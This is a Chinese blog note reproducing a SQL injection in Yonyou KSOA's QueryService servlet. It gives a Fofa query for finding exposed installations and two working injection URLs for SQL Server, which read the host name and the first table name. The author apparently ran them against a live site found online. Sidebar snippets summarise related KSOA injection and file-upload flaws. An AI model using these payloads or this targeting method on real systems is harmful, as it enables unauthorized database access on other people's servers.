用友-时空KSOA QueryService sql注入漏洞复现_笔记

最新推荐文章于 2024-08-02 12:30:26 发布
最新推荐文章于 2024-08-02 12:30:26 发布
阅读量346 收藏 2
点赞数 7
分类专栏: 漏洞复现 文章标签: sql 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50488257/article/details/138213493
版权
本文描述了作者尝试复现网上关于用友-时空KSOAQueryServicesql注入漏洞的过程,包括利用Fofa找到相关站点,分析接口并猜测SQLServer数据库,通过构造poc验证SQL注入的存在,如查看主机名和查询第一个表名。
摘要由CSDN通过智能技术生成

在网上看见大佬们发的用友-时空KSOA QueryService sql注入漏洞复现文章,尝试漏洞复现。

借鉴文章:用友-时空KSOA QueryService sql注入漏洞-CSDN博客

fofa语句:

app="用友-时空KSOA"

fofa上找了一个在用站点

访问接口信息

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=

感觉应该有sql注入

发现使用的数据库是SQL Server数据库,发现忘记SQL Server数据库的语句了。

在网上查资料。

被自己菜笑了。

资料:https://blog.51cto.com/u_16213569/8134987     

使用查看主机名、查询当前库第一个表名来验证sql注入是否存在

poc

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20host_name())

查询到了对应主机名

poc

http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27U%27)

查看第一个数据库的表名,这里就不放图片了。

要努力啊啊啊!!
关注
专栏目录
用友时空 KSOA 多处SQL注入漏洞复现
0xSec
12-13 1503
用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞获取数据库权限,启用xp_cmdshell 可执行任意命令获取服务器权限。
用友-时空KSOA QueryService sql注入漏洞
weixin_43567873的博客
03-05 665
用友-时空KSOA QueryService sql注入漏洞
漏洞复现用友 U8-cloud api_hr sql注入漏洞
凝聚力安全团队
06-27 438
用友 U8-cloud api/hr 接口存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品upload.jsp存在任意文件上传漏洞
用友时空KSOA 存在反射XSS
最新发布
2301_77012231的博客
08-02 249
用友时空KSOA 存在反射型跨站脚本攻击(XSS)漏洞,通过向用户提供恶意链接或注入恶意代码来利用。当用户点击这些链接或访问包含恶意代码的页面时,攻击者可以在用户的浏览器中执行恶意脚本,从而窃取用户信息、会话令牌等敏感数据或对用户进行其他有害操作。及时修复这种漏洞非常重要,以确保系统和用户数据的安全。FOFA:app="用友-时空KSOA"对系统做输入验证和过滤。
漏洞复现用友时空KSOA sKeyvalue参数存在SQL注入漏洞
qq_34780861的博客
04-01 301
用友时空KSOA平台sKeyvalue参数存在SQL注入漏洞
用友时空KSOA、CCERP sql注入漏洞复现
09-25 428
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
用友时空KSOA SQL注入漏洞[2023-HW]
holyxp的博客
08-16 1096
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。
用友时空KSOA-imagefield接口存在SQL注入漏洞
qq_36334672的博客
04-01 205
用友时空KSOA imagefield接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
用友时空KSOA SQL注入漏洞复现
0xSec
08-13 2605
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
用友时空KSOA PreviewKPQT SQL注入漏洞复现
0xSec
07-25 3225
用友时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友时空ccerp、ksoa zhiydoc表kl解密函数
05-27
放在数据库执行 使用方法 select dbo.jm_kl(kl),* from zhiydoc
用友时空KSOA 多处 SQL注入漏洞复现
0xSec
07-31 577
用友时空KSOA系统 PrintZP.jsp、PrintZPFB.jsp、PrintZPYG.jsp、PrintZPZP.jsp、fillKP.jsp等多处接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
用友时空KSOA存在sql注入漏洞 附POC
nnn2188185的博客
09-24 517
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,该产品common/dept.jsp接口存在SQL注入漏洞
用友时空KSOA V9.0文件上传漏洞复现
06-21 1325
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友时空KSOAV9.0文件上传漏洞复现
weixin_53884648的博客
05-22 1279
用友时空文件上传漏洞复现
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell
随心所欲不逾矩
09-19 904
软件介绍:用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件上传漏洞。开开心心连接马,嗯,连不上,emm,头疼,有防御。上传成功是这个模样,嗯,被解析了。但是,发现,有360主动防御,很头疼。
【1day】用友时空KSOA平台 任意文件上传漏洞学习
记录并分享学习安全的知识点..
09-29 382
用友时空KSOA平台是由用友网络科技股份有限公司开发的一款企业级协同办公平台,旨在提高企业管理效率和协作效率。该平台提供了多种功能模块,包括组织管理、人力资源管理、工作流管理、知识管理、项目管理、文档管理等。用友时空KSOA平台存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
用友时空CCERP/KSOA/CDM数据字典自生成脚本
az44yao的专栏
03-21 2454
--自生成V7/CCERP/KSOA/CDM系列的数据字典 SELECT b.tbname 英文表名,b.chnname 中文表名,a.name as 英文字段名, isnull(c.chnname,'') as 中文字段名, d.name AS 字段类型,case when a.xtype in (239,231,175,167) then a.length else 0 end as 长度
用友时空KSOA9.0技术手册:多架构对比与部署指南
用友时空信息融通平台KSOA9.0技术手册》是由用友软件股份有限公司于2010年1月发布的一份全面指南,专为理解和部署KSOA9.0系统而设计。该手册主要分为五个部分,详尽地介绍了产品的架构设计、安装步骤、系统控制、...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值